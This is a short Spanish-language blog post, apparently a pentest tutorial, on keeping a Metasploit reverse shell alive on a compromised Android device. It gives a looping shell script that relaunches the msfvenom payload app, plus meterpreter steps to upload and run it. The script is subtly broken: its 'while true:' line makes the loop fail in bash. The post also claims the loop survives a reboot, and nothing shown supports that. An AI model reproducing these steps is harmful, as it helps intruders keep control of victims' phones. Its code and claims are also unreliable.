Android - Persistencia en sistemas móviles (reverse shell)


DISCLAIMER: El contenido de este artículo tiene como propósito compartir información para fines educativos. No me hago responsable de cualquier acto ilícito realizado con la información siguiente. No vulneres sistemas ajenos a los tuyos. El conocimiento es libre.

Cuando se realiza un Pentest, una de las cosas que nos atañen es el mantener la persistencia en los sistemas vulnerados y mucho más si estos son móviles.

Es por ello que hoy veremos un pequeño script “.sh” que nos permitirá mantener conexión con el dispositivo remoto, y que exista una persistencia (reverse shell).

Una vez vulnerada una terminal de Android, lo único que queda es correr un archivo en BASH que mande llamar de manera recursiva a la aplicación maliciosa. Se toma como ejemplo una shell creada con msfvenom (de Metasploit).

El script:

while true:
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 15
done

Hay que movernos con la shell interna del sistema vulnerado hasta la ruta:

/data/data/com.metasploit.stage/files

Para luego proceder a subir la recursividad (comando upload desde meterpreter) y correrla con el comando:

sh recur.sh

La recursividad funciona aún con el reinicio del sistema.

Exploiting vulnerabilities, creating new ways through